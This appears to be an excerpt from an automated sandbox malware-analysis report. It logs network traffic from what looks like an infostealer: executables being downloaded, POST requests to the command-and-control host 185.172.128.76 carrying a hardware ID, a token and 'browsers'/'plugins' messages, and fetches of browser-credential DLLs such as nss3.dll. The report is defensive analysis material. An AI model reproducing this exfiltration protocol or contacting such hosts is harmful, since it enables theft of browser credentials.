00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 3c 3d 00 00 00 a0 35 00 00 3e 00 00 00 8a 35 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 b0 56 01 00 00 e0 35 00 00 58 01 00 00 c8 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 8c 6d 00 00 00 40 37 00 00 00 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9c 4e 00 00 00 b0 37 00 00 50 00 00 00 20 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 61 00 d2 09 00 00 00 00 38 00 00 0a 00 00 00 70 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 10 38 00 00 00 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 20 38 00 00 02 00 00 00 7a 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 84 9a 04 00 00 30 38 00 00 9c 04 00 00 7c 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 eb fe 0d 00 00 d0 3c 00 00 00 0e 00 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:12 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:14 GMTContent-Type: application/x-msdos-programContent-Length: 257872Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Apr 2024 08:27:15 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Apr 2024 08:27:39 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Wed, 24 Apr 2024 21:15:46 GMTETag: "85400-616de2c892480"Accept-Ranges: bytesContent-Length: 545792Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 08 c4 c7 27 69 aa 94 27 69 aa 94 27 69 aa 94 93 f5 5b 94 37 69 aa 94 93 f5 59 94 a0 69 aa 94 93 f5 58 94 38 69 aa 94 1c 37 a9 95 33 69 aa 94 1c 37 af 95 14 69 aa 94 1c 37 ae 95 05 69 aa 94 2e 11 39 94 22 69 aa 94 27 69 ab 94 7d 69 aa 94 8d 37 a3 95 25 69 aa 94 8d 37 55 94 26 69 aa 94 27 69 3d 94 26 69 aa 94 8d 37 a8 95 26 69 aa 94 52 69 63 68 27 69 aa 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 76 29 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 b0 06 00 00 b4 01 00 00 00 00 00 b6 80 05 00 00 10 00 00 00 c0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 08 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 9c 07 00 28 00 00 00 00 f0 07 00 40 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 6c 80 00 00 b0 80 07 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 81 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 06 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 31 af 06 00 00 10 00 00 00 b0 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 aa e2 00 00 00 c0 06 00 00 e4 00 00 00 b4 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 00 00 00 b0 07 00 00 0e 00 00 00 98 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 f8 01 00 00 00 e0 07 00 00 02 00 00 00 a6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 40 28 00 00 00 f0 07 00 00 2a 00 00 00 a8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 6c 80 00 00 00 20 08 00 00 82 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHCGCGCFHIDBFHIIJKJHost: 185.172.128.76Content-Length: 216Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 41 35 37 39 42 41 33 33 41 44 32 33 32 32 36 39 35 39 30 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 31 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 43 47 43 47 43 46 48 49 44 42 46 48 49 49 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="hwid"3EA579BA33AD2322695909------KEHCGCGCFHIDBFHIIJKJContent-Disposition: form-data; name="build"default10------KEHCGCGCFHIDBFHIIJKJ--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDGHost: 185.172.128.76Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="message"browsers------JKFIDGDHJEGIEBFHDGDG--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBFHost: 185.172.128.76Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 41 45 48 44 42 41 41 45 43 42 46 48 4a 4b 46 43 46 42 46 2d 2d 0d 0a Data Ascii: ------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------CAEHDBAAECBFHJKFCFBFContent-Disposition: form-data; name="message"plugins------CAEHDBAAECBFHJKFCFBF--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJKEHCAKFCAKFHDAAAHost: 185.172.128.76Content-Length: 6619Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/sqlite3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAKHost: 185.172.128.76Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJKKKFIIJJKJKFIECBFHost: 185.172.128.76Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECFIEGDBKJKFIDHIECGHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 47 2d 2d 0d 0a Data Ascii: ------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------IECFIEGDBKJKFIDHIECGContent-Disposition: form-data; name="file"------IECFIEGDBKJKFIDHIECG--
Source: global traffic	HTTP traffic detected: POST /3cd2b41cbde8fc9c.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDHDGDAAAAKFIDGHJDGHost: 185.172.128.76Content-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 36 64 30 66 31 34 65 62 64 61 63 36 30 32 39 38 33 38 66 37 35 33 30 63 31 63 64 65 30 64 30 32 65 65 34 31 34 31 38 63 66 38 61 37 65 36 63 33 62 66 61 63 64 38 36 61 34 35 62 61 31 62 34 39 63 64 37 32 61 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 44 47 44 41 41 41 41 4b 46 49 44 47 48 4a 44 47 2d 2d 0d 0a Data Ascii: ------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="token"256d0f14ebdac6029838f7530c1cde0d02ee41418cf8a7e6c3bfacd86a45ba1b49cd72a6------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------IJDHDGDAAAAKFIDGHJDGContent-Disposition: form-data; name="file"------IJDHDGDAAAAKFIDGHJDG--
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/freebl3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/mozglue.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/msvcp140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/nss3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/softokn3.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /15f649199f40275b/vcruntime140.dll HTTP/1.1Host: 185.172.128.76Cache-Control: no-cache
